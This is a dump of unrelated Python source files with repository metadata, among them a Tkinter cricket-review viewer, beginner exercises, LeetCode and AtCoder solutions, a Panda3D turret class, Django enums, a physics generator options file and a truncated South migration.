frame=imutils.resize(frame,width=SET_WIDTH,height=SET_HEIGHT)
frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0,image=frame,anchor=tkinter.NW)
SET_WIDTH=650
SET_HEIGHT=368
window=tkinter.Tk()
window.title("Shivam DRS")
cv_img=cv2.cvtColor(cv2.imread("welcome.png"),cv2.COLOR_BGR2RGB)
canvas=tkinter.Canvas(window,width=SET_WIDTH,height=SET_HEIGHT)
photo=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(cv_img))
image_on_canvas=canvas.create_image(0,0,ancho=tkinter.NW,image=photo)
canvas.pack()
btn=tkinter.Button(window,text="<<Previous(fast),width=50",command=partial(play,-25))
btn.pack()
btn=tkinter.Button(window,text="<<Previous(slow),width=50",command=partial(play,-2))
btn.pack()
btn=tkinter.Button(window,text="Next(fast)>>,width=50",command=partial(play,25))
btn.pack()
btn=tkinter.Button(window,text="Next(slow)>>,width=50",command=partial(play,2))
btn.pack()
btn=tkinter.Button(window,text="Give Out,width=50",command=out)
btn.pack()
btn=tkinter.Button(window,text="Give Not Out,width=50",command=not_out)
btn.pack()
window.mainloop()
|
[
"shivamdatta465@gmail.com"
] |
shivamdatta465@gmail.com
|
f30e390e9256b93999d1c3a66ed1a5ae6ada94e0
|
e262e64415335060868e9f7f73ab8701e3be2f7b
|
/.history/demo_20201106173944.py
|
6d65b718ae355669c834ddbbe48686434fa086b7
|
[] |
no_license
|
Allison001/developer_test
|
6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63
|
b8e04b4b248b0c10a35e93128a5323165990052c
|
refs/heads/master
| 2023-06-18T08:46:40.202383
| 2021-07-23T03:31:54
| 2021-07-23T03:31:54
| 322,807,303
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,275
|
py
|
# a = 1
# if a==0:
# print("a=0")
# else:
# print("a!0")
# """
# x>1 (3x-5)
# -1<=x<=1 (x+2)
# x < -1 (5x+3)
# """
# x = int(input("输入您的数字:"))
# if x > 1:
# print(3*x-5)
# else:
# if x >= -1:
# print(x + 2)
# else:
# print(5*x+3)
# 猜数字游戏
# import random
# computet_num = random.randint(1,100)
# while True:
# people_num = int(input("请输入您的数字:"))
# if people_num < computet_num:
# print("大一点")
# elif people_num > computet_num:
# print("小一点")
# else:
# print("猜对了")
# break
# def fun1(a,b,c):
# print("这是参数a:",a)
# print("这是参数b:",b)
# print("这是参数c:",c)
# fun1(1,23,4)
# def fun1(a):
# # return "ac"
# print("a")
# fun1("c")
# def fun1(a,b,c,d):
# print(a,b,c,d)
# fun1(10,13,d=13,c=90)
# fun1 = lambda x: x+10
# print(fun1(5))
# def fun1(x):
# return x+10
# print(fun1(5))
# fun1 = lambda x,y: x+y
# print(fun1(10,12))
# list = ["ha"]
# b = {"hah"}
# c = "a"
# d = ("a","v")
# print(type(list))
# print(type(b))
# print(type(c))
# print(type(d))
lista = ["a","b","c"]
# lista.append("b")
# lista.insert(5,"e")
# lista.remove("b")
lista.pop(0)
print(lista)
|
[
"zhangyingxbba@gmail.com"
] |
zhangyingxbba@gmail.com
|
cec74534f2de9765f471aa6aae72fcbe7d53e3ac
|
0085acce00bbd20658f312f30575632b6272090d
|
/leetcode_python2/lc917_reverse_only_letters.py
|
edd5790198b06f867191c4684a3f882a2b368ac8
|
[] |
no_license
|
garderobin/Leetcode
|
52fce8279e4963bc7824a19aae903ca6aad83867
|
ea10ce7fe465431399e444c6ecb0b7560b17e1e4
|
refs/heads/master
| 2021-01-17T14:43:49.423071
| 2018-11-12T00:55:47
| 2018-11-12T00:55:47
| 51,183,667
| 0
| 1
| null | 2018-11-12T00:55:48
| 2016-02-06T01:00:36
|
Java
|
UTF-8
|
Python
| false
| false
| 580
|
py
|
from abc import ABCMeta, abstractmethod
class ReverseOnlyLetters:
__metaclass__ = ABCMeta
@abstractmethod
def reverse_only_letters(self, S):
"""
:type S: str
:rtype: str
"""
class ReverseOnlyLettersImpl1(ReverseOnlyLetters):
"""
Time: O(n)
Space: O(n)
"""
def reverse_only_letters(self, S):
letters, rs = [c for c in S if c.isalpha()], []
for c in S:
if c.isalpha():
rs.append(letters.pop())
else:
rs.append(c)
return ''.join(rs)
|
[
"garderobinshot@hotmail.com"
] |
garderobinshot@hotmail.com
|
b8466fc6eb726ee2342e5e499d2da3d64d0cb182
|
76938f270e6165514162856b2ed33c78e3c3bcb5
|
/lib/coginvasion/battle/TurretGag.py
|
f6649cdc3a30755cf243d311c6153058e48d7e42
|
[] |
no_license
|
coginvasion/src
|
9a5ec682845cc4c9c013fcc35e9b379bd4360b6c
|
2d7fcdb0cd073050250cb51292ee48300a9fe19f
|
refs/heads/master
| 2021-01-19T06:50:11.786112
| 2015-11-08T12:28:52
| 2015-11-08T12:28:52
| 61,545,543
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,296
|
py
|
# Embedded file name: lib.coginvasion.battle.TurretGag
"""
Filename: TurretGag.py
Created by: DecodedLogic (10Aug15)
"""
from panda3d.core import CollisionSphere, CollisionNode, BitMask32, CollisionHandlerEvent, NodePath
from direct.showbase.DirectObject import DirectObject
from direct.interval.ProjectileInterval import ProjectileInterval
from direct.actor.Actor import Actor
from lib.coginvasion.globals import CIGlobals
from lib.coginvasion.gags.GagManager import GagManager
class TurretGag(DirectObject):
def __init__(self, turret, collideEventName, gagName):
DirectObject.__init__(self)
self.turret = turret
self.collideEventName = collideEventName
self.eventName = 'turretGagSensor' + str(id(self)) + '-into'
self.trackName = 'turretGagTrack' + str(id(self))
self.track = None
self.gravityMult = 0.9
self.duration = 2.5
self.setClass(gagName)
return
def setClass(self, gagName):
gagMgr = GagManager()
self.gagClass = gagMgr.getGagByName(gagName)
self.gag = None
return
def build(self):
self.gagClass.build()
self.gag = self.gagClass.getGag()
self.gag.reparentTo(self.turret.getCannon())
self.gag.setY(5.2)
self.gag.setHpr(90, -90, 90)
if isinstance(self.gag, Actor):
self.gag.loop('chan')
def shoot(self, rangeVector):
if not self.gag:
return
rangeNode = NodePath('Shoot Range')
rangeNode.reparentTo(self.turret.getCannon())
rangeNode.setScale(render, 1)
rangeNode.setPos(rangeVector)
rangeNode.setHpr(90, -90, 90)
self.gag.setScale(self.gag.getScale(render))
self.gag.setScale(self.gag.getScale(render))
self.gag.setPos(self.gag.getPos(render))
self.gag.reparentTo(render)
self.gag.setHpr(rangeNode.getHpr(render))
base.audio3d.attachSoundToObject(self.gagClass.woosh, self.gag)
self.gagClass.woosh.play()
self.track = ProjectileInterval(self.gag, startPos=self.gag.getPos(render), endPos=rangeNode.getPos(render), gravityMult=self.gravityMult, duration=self.duration, name=self.trackName)
self.track.setDoneEvent(self.track.getName())
self.acceptOnce(self.track.getDoneEvent(), self.cleanup)
self.track.start()
fireSfx = base.audio3d.loadSfx('phase_4/audio/sfx/MG_cannon_fire_alt.mp3')
base.audio3d.attachSoundToObject(fireSfx, self.turret.getCannon())
fireSfx.play()
if self.turret.isLocal():
self.buildCollisions()
self.acceptOnce(self.eventName, self.handleCollision)
def getGag(self):
return self.gag
def buildCollisions(self):
pieSphere = CollisionSphere(0, 0, 0, 1)
pieSensor = CollisionNode('turretGagSensor' + str(id(self)))
pieSensor.addSolid(pieSphere)
pieNP = self.gag.attachNewNode(pieSensor)
pieNP.setCollideMask(BitMask32(0))
pieNP.node().setFromCollideMask(CIGlobals.WallBitmask | CIGlobals.FloorBitmask)
event = CollisionHandlerEvent()
event.set_in_pattern('%fn-into')
event.set_out_pattern('%fn-out')
base.cTrav.addCollider(pieNP, event)
def handleCollision(self, entry):
messenger.send(self.collideEventName, [entry, self])
def getID(self):
return self.gagClass.getID()
def getCollideEventName(self):
return self.collideEventName
def cleanup(self):
if hasattr(self, 'collideEventName'):
del self.collideEventName
if self.track:
self.track.finish()
self.track = None
if self.turret:
if self.turret.entities and self in self.turret.entities:
self.turret.entities.remove(self)
self.turret = None
self.ignore(self.eventName)
self.duration = None
self.gravityMult = None
self.eventName = None
self.trackName = None
if self.gagClass:
self.gagClass.cleanupGag()
self.gagClass = None
if self.gag:
if isinstance(self.gag, Actor):
self.gag.cleanup()
self.gag.removeNode()
self.gag = None
return
|
[
"ttarchive@yandex.com"
] |
ttarchive@yandex.com
|
96e2fee44e3bc7e5c5602c9a487d8a04b807a7a8
|
c67f2d0677f8870bc1d970891bbe31345ea55ce2
|
/zippy/benchmarks/src/micro/function-call2.py
|
48b9f47030ccbdc325c255fd7103349718f10ba7
|
[
"BSD-3-Clause"
] |
permissive
|
securesystemslab/zippy
|
a5a1ecf5c688504d8d16128ce901406ffd6f32c2
|
ff0e84ac99442c2c55fe1d285332cfd4e185e089
|
refs/heads/master
| 2022-07-05T23:45:36.330407
| 2018-07-10T22:17:32
| 2018-07-10T22:17:32
| 67,824,983
| 324
| 27
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 485
|
py
|
# zwei 10/10/13
# function calls
import time
def emptyFunction(arg):
return arg
def callFunctions(num):
count = 0
for i in xrange(num):
ret = emptyFunction(i)
count += 1
return count
def measure():
print("Start timing...")
start = time.time()
sum = callFunctions(1000000000) #1000000
print("Number of calls ", sum)
duration = "%.3f\n" % (time.time() - start)
print("function-call: " + duration)
#warm up
for run in xrange(10000):
callFunctions(50000)
measure()
|
[
"ndrzmansn@gmail.com"
] |
ndrzmansn@gmail.com
|
c09bdad7664c65fe8d8e3cb86ec8865551e304a9
|
1c6e5c808c1a3e6242e40b15ae711574e670c3b6
|
/food_management/constants/enums.py
|
82bfebbb5237fed3541c3c18fdce86151e5b05c3
|
[] |
no_license
|
KatakamVedaVandhana/smart_food_management-vandhana
|
dbe195994c110471d0ae7a5a53adef1441e86466
|
19e410a2aa792b22889a2dfed599312ba6b5a7ad
|
refs/heads/master
| 2023-07-09T05:43:17.491313
| 2020-06-15T06:44:00
| 2020-06-15T06:44:00
| 269,609,923
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,043
|
py
|
import enum
from ib_common.constants import BaseEnumClass
class CodeLanguage(BaseEnumClass, enum.Enum):
python = "PYTHON"
c_language = "C"
c_plus_plus = "CPP"
python36 = "PYTHON36"
python37 = "PYTHON37"
python38 = "PYTHON38"
python38_datascience = "PYTHON38_DATASCIENCE"
python38_aiml = "PYTHON38_AIML"
class CategoryType(BaseEnumClass, enum.Enum):
indian_bread = "Indian-Bread"
curry = "Curry"
rice = "Rice"
class UnitType(BaseEnumClass, enum.Enum):
pieces = "pieces"
cups = "cups"
laddles = "laddles"
class TypeOfMeal(BaseEnumClass, enum.Enum):
breakfast = "Breakfast"
lunch = "Lunch"
dinner = "Dinner"
class CourseType(BaseEnumClass, enum.Enum):
half_meal = 'Half-meal'
full_meal = 'Full-meal'
custom_meal = 'Custom-meal'
skip_meal = 'Skip-meal'
class RatingType(BaseEnumClass, enum.Enum):
one = 1
two = 2
three = 3
four = 4
five = 5
class BaseUnitType(BaseEnumClass, enum.Enum):
pieces = 'pieces'
kilogram = 'kg'
|
[
"vandhanakatakam@gmail.com"
] |
vandhanakatakam@gmail.com
|
b16fadb21431c33e8e177f4b007b85063c3e167a
|
9f52ac141023dcddb4fbe88b881feaca5be6328f
|
/ros/build/styx_msgs/catkin_generated/pkg.develspace.context.pc.py
|
18610254de217a4132dbf9fb576247ad636a13ec
|
[
"MIT"
] |
permissive
|
uniquetrij/CarND-T3-P4-Capstone
|
9b6613339eb33421112130e7b37f46aaaa88a298
|
82f85af8c5554b51afca3c282f6230d3733a376a
|
refs/heads/master
| 2020-03-18T11:53:58.175809
| 2018-06-08T05:54:29
| 2018-06-08T05:54:29
| 134,696,861
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 512
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/anupam/Desktop/CarND-T3-P4-Capstone/ros/devel/include".split(';') if "/home/anupam/Desktop/CarND-T3-P4-Capstone/ros/devel/include" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "styx_msgs"
PROJECT_SPACE_DIR = "/home/anupam/Desktop/CarND-T3-P4-Capstone/ros/devel"
PROJECT_VERSION = "0.0.0"
|
[
"anupamb266@gmail.com"
] |
anupamb266@gmail.com
|
1300873c8a24b12df81df6006a135fe297dab299
|
7095bd6c7df3e36beeaf6f2fff321c1994778817
|
/try_django/src/blog/migrations/0003_auto_20190609_1303.py
|
8b419d2c612ca7e259bd41fb33966cc36ccff5fd
|
[] |
no_license
|
bajpaiNikhil/dev-blog
|
4c6f0b5d6a96cc2552acd91b44e3fe74629bdaed
|
b2a3823931520292cabaeba94bd8161265f143b0
|
refs/heads/master
| 2020-06-02T08:39:12.043844
| 2019-07-04T03:25:37
| 2019-07-04T03:25:37
| 191,102,800
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
# Generated by Django 2.2 on 2019-06-09 07:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0002_blogpost_slug'),
]
operations = [
migrations.AlterField(
model_name='blogpost',
name='slug',
field=models.SlugField(default='my-slug', unique=True),
),
]
|
[
"nikhil.cse16@gmail.com"
] |
nikhil.cse16@gmail.com
|
3d325135422a83e7942d4164fb53d194a67e4d51
|
f13acd0d707ea9ab0d2f2f010717b35adcee142f
|
/AtCoder_Virtual_Contest/20181228-AtCoder Run/abc060/a.py
|
e46e119bb58a491f4e1804883c6cc27488c5b02f
|
[
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] |
permissive
|
KATO-Hiro/AtCoder
|
126b9fe89fa3a7cffcbd1c29d42394e7d02fa7c7
|
bf43320bc1af606bfbd23c610b3432cddd1806b9
|
refs/heads/master
| 2023-08-18T20:06:42.876863
| 2023-08-17T23:45:21
| 2023-08-17T23:45:21
| 121,067,516
| 4
| 0
|
CC0-1.0
| 2023-09-14T21:59:38
| 2018-02-11T00:32:45
|
Python
|
UTF-8
|
Python
| false
| false
| 224
|
py
|
# -*- coding: utf-8 -*-
def main():
a, b, c = map(str, input().split())
if a[-1] == b[0] and b[-1] == c[0]:
print('YES')
else:
print('NO')
if __name__ == '__main__':
main()
|
[
"k.hiro1818@gmail.com"
] |
k.hiro1818@gmail.com
|
27595488cbfbd204c5edd5aa32464d6815764993
|
4e67c2edd71493a98a3f13e5b2073c1d05b1b656
|
/Semestre 01/LogicaProgramacao/Aula 04.08.2020/Decrescente.py
|
eb1b31d2b5274617cd7fd88602938f3541556159
|
[] |
no_license
|
felipellima83/UniCEUB
|
05991d7a02b13cd4e236f3be3a34726af2dc1504
|
dbc44866545b5247d1b5f76ec6e9b7778e54093e
|
refs/heads/master
| 2023-07-08T19:04:19.830473
| 2021-08-12T12:33:49
| 2021-08-12T12:33:49
| 249,958,282
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 274
|
py
|
#Professor: Antônio Barbosa Junior
#Disciplina: Lógica de programação
#Aluno: Felipe Ferreira Lima e Lima
#Matrícula: 22001310
#Data: 08/04/2020
#Exercício 06
soma = 0
i = 0
lista = range(7, -1, -1)
# ou lista = [7,6,5,4,3,2,1,0]
for x in lista:
print(x, end=" ")
|
[
"felipellima83@gmail.com"
] |
felipellima83@gmail.com
|
38c43c83964024b74479add7f0bcda934ea9529c
|
6aa3c372bd2b058be406955768b3fc2047b580e6
|
/modules/datastructures/TrainData_DelphesDomAda.py
|
fdfbc32b890f974127958ad46519ae415b4a7411
|
[] |
no_license
|
mverzett/DeepJet-1
|
b1aa1491bba284adfa78208237c48ef37fbe4ab3
|
04efbac1a6e4bef97a7ca1bc64345cc048f7ce20
|
refs/heads/master
| 2021-03-30T15:35:20.059508
| 2018-02-20T17:28:07
| 2018-02-20T17:28:07
| 120,431,339
| 0
| 0
| null | 2018-02-06T09:25:49
| 2018-02-06T09:25:49
| null |
UTF-8
|
Python
| false
| false
| 1,988
|
py
|
'''
Created on 21 Feb 2017
@author: jkiesele
'''
from TrainDataDeepJetDelphes import TrainDataDeepJetDelphes, fileTimeOut
class TrainData_DelphesDomAda(TrainDataDeepJetDelphes):
'''
example data structure - basis for further developments
'''
def __init__(self):
'''
Constructor
'''
TrainDataDeepJetDelphes.__init__(self)
self.addBranches(['jet_pt', 'jet_eta']) #consider jet pt and eta
self.addBranches(['track_pt'], 6) #consider the pt of the first 6 tracks
self.addBranches(['track_releta', 'track_sip3D', 'track_sip2D'], 10) #all those for the first 10 tracks
self.registerBranches(['isMC','isTtbar'])
#creates label weights per batch
#due to normalisation, two are sufficient for 3 labels (B, C UDSG)
#self.generatePerBatch=None #[[0.2,5.],[0.2,5.]]
def readFromRootFile(self,filename,TupleMeanStd, weighter):
import numpy
Tuple = self.readTreeFromRootToTuple(filename)
mclabel=Tuple['isMC'].view(numpy.ndarray)
mclabel=mclabel.reshape(mclabel.shape[0],1)
proclabel=Tuple['isTtbar'].view(numpy.ndarray)
proclabel=proclabel.reshape(mclabel.shape[0],1)
weights,x_all,alltruth, notremoves =self.getFlavourClassificationData(filename,TupleMeanStd, weighter)
if self.remove:
#print('remove')
mclabel=mclabel[notremoves > 0]
proclabel=proclabel[notremoves > 0]
domaintruth_datamc=numpy.hstack((mclabel,alltruth))
labeltruth=domaintruth_datamc
#domaintruth_ttbarqcd=numpy.hstack((proclabel,alltruth))
self.w=[weights]
#the label fraction weights are computed on the fly
self.x=[x_all, alltruth]
#the truth
self.y=[labeltruth,domaintruth_datamc]
|
[
"jkiesele@cern.ch"
] |
jkiesele@cern.ch
|
f3acdac3cec7c99140af2bf68d17ebb3f6c47ebd
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03112/s044499237.py
|
d133af3812b23eda812e0e4e272d7974e8c817c9
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,289
|
py
|
# なぜかうまくいかない
import sys, re, os
from collections import deque, defaultdict, Counter
from math import ceil, sqrt, hypot, factorial, pi, sin, cos, radians
from itertools import permutations, combinations, product, accumulate
from operator import itemgetter, mul
from copy import deepcopy
from string import ascii_lowercase, ascii_uppercase, digits
from fractions import gcd
from bisect import bisect, bisect_right, bisect_left
def input(): return sys.stdin.readline().strip()
def INT(): return int(input())
def MAP(): return map(int, input().split())
def S_MAP(): return map(str, input().split())
def LIST(): return list(map(int, input().split()))
def S_LIST(): return list(map(str, input().split()))
sys.setrecursionlimit(10 ** 9)
INF = float('inf')
mod = 10 ** 9 + 7
A, B, Q = MAP()
S = [INT() for i in range(A)]
T = [INT() for i in range(B)]
X = [INT() for i in range(Q)]
S.insert(0, -INF)
S.append(INF)
T.insert(0, -INF)
T.append(INF)
for x in X:
s = bisect(S, x)
t = bisect(T, x)
# print(s, t)
# a = min(x - S[s-1], S[s] - x)
# b = min(x - T[t-1], T[t] - x)
res = INF
for a in [S[s-1], S[s]]:
for b in [T[t-1], T[t]]:
res = min(res, min(abs(a - x) + abs(b - a), abs(x - b) + abs(b - a)))
print(res)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
41cc2e1bdbdc341bf991d5e4a6e225b13acba6cb
|
6710c52d04e17facbc9fb35a7df313f7a2a7bd53
|
/0234. Palindrome Linked List.py
|
38f97dc46d5f45578be5aaebb55f90e98ad5532b
|
[] |
no_license
|
pwang867/LeetCode-Solutions-Python
|
535088fbe747a453360457728cc22cf336020bd2
|
188befbfb7080ba1053ee1f7187b177b64cf42d2
|
refs/heads/master
| 2022-11-13T16:20:28.211707
| 2020-06-28T06:01:14
| 2020-06-28T06:01:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,333
|
py
|
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
# time O(n), space O(1) in place
class Solution(object):
def isPalindrome(self, head):
"""
:type head: ListNode
:rtype: bool
"""
if not head or not head.next:
return True
pre, cur = None, head
fast = head.next
while fast and fast.next:
fast = fast.next.next
copy = cur.next
cur.next = pre # reverse the first half
pre, cur = cur, copy
if fast: # original list has even length
if cur.val != cur.next.val:
return False
return self.isSameList(pre, cur.next.next)
else: # odd length
return self.isSameList(pre, cur.next)
def isSameList(self, head1, head2):
while head1 and head2:
if head1.val != head2.val:
return False
head1 = head1.next
head2 = head2.next
return not head1 and not head2
"""
Given a singly linked list, determine if it is a palindrome.
Example 1:
Input: 1->2
Output: false
Example 2:
Input: 1->2->2->1
Output: true
Follow up:
Could you do it in O(n) time and O(1) space?
"""
|
[
"wzhou007@ucr.edu"
] |
wzhou007@ucr.edu
|
029c81b549e9282b6f68c0739e2079610361cce5
|
72246a70e272dfc279b1b4945c232f16900bb963
|
/To_write_in_the_txt_file.py
|
8ea3d0ff35b684318fb43fac57e91870fad16a2e
|
[] |
no_license
|
stheartsachu/Python_basics_and_data_base_operations
|
bb15f4b06e404b8c3456061478e1a86fcb541fed
|
6441eb247336cf5a0e935efc43f48d12aa32affe
|
refs/heads/master
| 2020-06-25T09:09:59.021325
| 2019-07-28T09:35:07
| 2019-07-28T09:35:07
| 199,268,012
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 436
|
py
|
# Let us simplify the code
# by using the "with" Keyword.
# write to a text file
with open('t.txt','w') as f :
f.write('HEllo World ! ')
f.close()
# It will be Closed automaticallly
# f = open('t.txt', mode = 'w')
# w = create and write
# r = read(default)
# a = append
# x = create if not exist
# with = with satement is used tp wrap the execution of a block of code
# within methods defined by a context manger
|
[
"seartsachu@gmail.com"
] |
seartsachu@gmail.com
|
9468f8e04cd8b22575a8e8a5cb5f2154b120d75d
|
be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1
|
/Gauss_v45r10p1/Gen/DecFiles/options/12315011.py
|
1eaf65a06d4accb4b62d4c0891406e399fbd51c4
|
[] |
no_license
|
Sally27/backup_cmtuser_full
|
34782102ed23c6335c48650a6eaa901137355d00
|
8924bebb935b96d438ce85b384cfc132d9af90f6
|
refs/heads/master
| 2020-05-21T09:27:04.370765
| 2018-12-12T14:41:07
| 2018-12-12T14:41:07
| 185,989,173
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,789
|
py
|
# file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/12315011.py generated: Wed, 25 Jan 2017 15:25:15
#
# Event Type: 12315011
#
# ASCII decay Descriptor: {[B+ -> K+ pi+ pi- e+ mu-]cc,[B+ -> K+ pi+ pi- e- mu+]cc}
#
from Configurables import Generation
Generation().EventType = 12315011
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bu_Kpipiemu=DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 521,-521 ]
# Ad-hoc particle gun code
from Configurables import ParticleGun
pgun = ParticleGun("ParticleGun")
pgun.SignalPdgCode = 521
pgun.DecayTool = "EvtGenDecay"
pgun.GenCutTool = "DaughtersInLHCb"
from Configurables import FlatNParticles
pgun.NumberOfParticlesTool = "FlatNParticles"
pgun.addTool( FlatNParticles , name = "FlatNParticles" )
from Configurables import MomentumSpectrum
pgun.ParticleGunTool = "MomentumSpectrum"
pgun.addTool( MomentumSpectrum , name = "MomentumSpectrum" )
pgun.MomentumSpectrum.PdgCodes = [ 521,-521 ]
pgun.MomentumSpectrum.InputFile = "$PGUNSDATAROOT/data/Ebeam4000GeV/MomentumSpectrum_521.root"
pgun.MomentumSpectrum.BinningVariables = "pteta"
pgun.MomentumSpectrum.HistogramPath = "h_pteta"
from Configurables import BeamSpotSmearVertex
pgun.addTool(BeamSpotSmearVertex, name="BeamSpotSmearVertex")
pgun.VertexSmearingTool = "BeamSpotSmearVertex"
pgun.EventType = 12315011
|
[
"slavomirastefkova@b2pcx39016.desy.de"
] |
slavomirastefkova@b2pcx39016.desy.de
|
158692323da657d0cf8086a5b00d0b90d3d7c5a8
|
bd4812ba7af196d2e866cbf2935b2e7308d95066
|
/python/leetcode/024_swap_nodes_in_pairs.py
|
d79edba96ef1dc07ede242c6bafa8a371bfe4052
|
[
"Apache-2.0"
] |
permissive
|
yxun/notebook
|
f507201e15c4376f0655121724254c0d5275c3b1
|
00eb1953d872a9a93a13d7cf23d8e4ed641d1ce7
|
refs/heads/master
| 2023-09-01T03:50:48.142295
| 2023-08-17T12:11:25
| 2023-08-17T12:11:25
| 207,569,654
| 2
| 2
|
Apache-2.0
| 2023-08-17T12:11:26
| 2019-09-10T13:38:49
|
Java
|
UTF-8
|
Python
| false
| false
| 1,334
|
py
|
#%%
"""
- Swap Nodes in Pairs
- https://leetcode.com/problems/swap-nodes-in-pairs/
- Medium
Given a linked list, swap every two adjacent nodes and return its head.
You may not modify the values in the list's nodes, only nodes itself may be changed.
Example:
Given 1->2->3->4, you should return the list as 2->1->4->3.
"""
#%%
class ListNode:
def __init__(self, data=0, next=None):
self.data = data
self.next = next
#%%
class S1:
def swapPairs(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if not head or not head.next:
return head
tmp = head.next
head.next = self.swapPairs(head.next.next)
tmp.next = head
return tmp
#%%
class S2:
def swapPairs(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if head == None or head.next == None:
return head
dummy = ListNode(-1)
dummy.next = head
cur = dummy
while cur.next and cur.next.next:
next_one, next_two, next_three = cur.next, cur.next.next, cur.next.next.next
cur.next = next_two
next_two.next = next_one
next_one.next = next_three
cur = next_one
return dummy.next
|
[
"yuanlin.yxu@gmail.com"
] |
yuanlin.yxu@gmail.com
|
11887d383e22055fe0ed0193394c2562e3d244b0
|
48934047ac284e2a9a745f00b5ec84b3d72382bf
|
/nyasha/blog/migrations/0005_auto__add_tag.py
|
e8afe3b0236239eb264ac782548a67fad230695b
|
[
"WTFPL"
] |
permissive
|
Apkawa/nyasha
|
e36f4281c33eb6135320391349e2dadee3c01666
|
0d126e93be273ba73b005a793340501377485c3e
|
refs/heads/master
| 2020-04-28T20:53:47.312077
| 2012-06-12T21:49:20
| 2012-06-12T21:49:20
| 1,100,616
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,518
|
py
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Tag'
db.create_table('blog_tag', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=42)),
))
db.send_create_signal('blog', ['Tag'])
# Adding M2M table for field tags on 'Post'
db.create_table('blog_post_tags', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('post', models.ForeignKey(orm['blog.post'], null=False)),
('tag', models.ForeignKey(orm['blog.tag'], null=False))
))
db.create_unique('blog_post_tags', ['post_id', 'tag_id'])
def backwards(self, orm):
# Deleting model 'Tag'
db.delete_table('blog_tag')
# Removing M2M table for field tags on 'Post'
db.delete_table('blog_post_tags')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
